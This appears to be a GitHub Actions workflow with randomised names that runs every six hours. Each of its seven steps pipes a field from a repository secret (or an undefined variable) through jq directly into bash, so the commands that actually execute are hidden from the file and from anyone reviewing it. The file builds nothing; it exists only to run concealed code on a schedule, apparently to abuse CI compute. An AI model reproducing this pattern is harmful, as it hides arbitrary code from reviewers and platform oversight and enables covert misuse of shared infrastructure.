name: nijiuhen6152
on:
  workflow_dispatch:
  schedule:
    - cron: '13 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nijiuhen6152
        env:
          e50: ${{ secrets.e50 }}
        run: |
          echo $e50 | jq -r .wjd316 | /bin/bash
          echo $ujop156 | jq -r .ha69 | /bin/bash
          echo $nx776 | jq -r .kdoy593 | /bin/bash
          echo $pe34 | jq -r .twoej81 | /bin/bash
          echo $amg96028 | jq -r .ur2 | /bin/bash
          echo $ch00249 | jq -r .j09589 | /bin/bash
          echo $e1 | jq -r .v535 | /bin/bash

